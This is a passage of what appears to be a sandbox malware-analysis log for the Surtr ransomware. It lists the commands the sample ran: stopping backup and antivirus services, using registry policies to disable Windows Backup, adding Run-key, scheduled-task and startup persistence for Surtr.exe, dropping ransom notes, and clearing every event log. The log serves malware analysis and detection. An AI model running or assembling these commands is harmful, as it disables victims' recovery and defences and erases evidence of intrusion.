C:\Windows\system32\net.exenet stop "AcronisAgent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"3⤵
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"3⤵
-
C:\Windows\system32\net.exenet stop "Antivirus"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"3⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"3⤵
-
C:\Windows\system32\net.exenet stop "EPSecurityService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"3⤵
-
C:\Windows\system32\net.exenet stop "IISAdmin"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"3⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\ProgramData\Service"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"3⤵
-
C:\Windows\system32\net.exenet stop "IMAP4Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IMAP4Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"3⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "macmnsvc"3⤵
-
C:\Windows\system32\net.exenet stop "macmnsvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "macmnsvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "masvc"3⤵
-
C:\Windows\system32\net.exenet stop "masvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "masvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBAMService"3⤵
-
C:\Windows\system32\net.exenet stop "MBAMService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBAMService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"3⤵
-
C:\Windows\system32\net.exenet stop "MBEndpointAgent"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeEngineService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeEngineService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFramework"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFramework"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFrameworkMcAfeeFramework"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McShield"3⤵
-
C:\Windows\system32\net.exenet stop "McShield"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe el5⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "AirSpaceChannel"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "FirstUXPerf-Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "General Logging"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "IHM_DebugChannel"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProc"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProcD3D"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationAsyncWrapper"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationContentProtection"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDS"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationMediaEngine"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformanceCore"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationSrcPrefetch"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AAD/Analytic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AAD/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ASN1/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Internal"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppSruProv"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"4⤵
-
